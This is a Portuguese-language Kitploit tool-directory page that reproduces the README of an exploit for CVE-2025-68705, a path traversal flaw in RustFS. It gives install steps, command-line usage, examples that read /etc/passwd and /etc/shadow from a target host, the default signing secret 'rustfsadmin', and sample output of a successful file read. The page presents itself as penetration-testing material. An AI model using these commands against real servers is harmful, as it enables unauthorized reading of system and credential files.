Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS Path Traversal Vulnerability Check | Kitploit
Ferramentas/GitHubGitHub/imjdl/cve-2025-68705
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS Path Traversal Vulnerability Check

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68705 - Exploração de Path Traversal no RustFS

Descrição

Este script explora uma vulnerabilidade de path traversal (CVE-2025-68705) no RustFS que permite ler arquivos arbitrários no servidor.

Requisitos

  • Python 3.6+
  • Consulte requirements.txt para dependências

Instalação

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Uso

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Argumentos Obrigatórios

ArgumentoDescrição
-H, --hostIP ou nome do host alvo
-p, --portNúmero da porta alvo
-f, --fileCaminho do arquivo para ler (opcional com --check-only)

Argumentos Opcionais

Exemplos

Ler arquivo /etc/passwd

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

Ler /etc/shadow com deslocamento e tamanho personalizados

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Usar chave secreta personalizada

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Apenas verificar se o alvo é vulnerável

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

Ler intervalo específico do arquivo

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Exemplo de Saída

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

Referências

  • RustFS Security Advisory
  • CVE-2025-68705
Baixar ferramenta
ArgumentoDescriçãoPadrão
-s, --secretChave secreta para assinaturarustfsadmin
-o, --offsetDeslocamento de leitura do arquivo0
-l, --lengthNúmero de bytes para ler4096
--check-onlyApenas verificar se o alvo é vulnerável-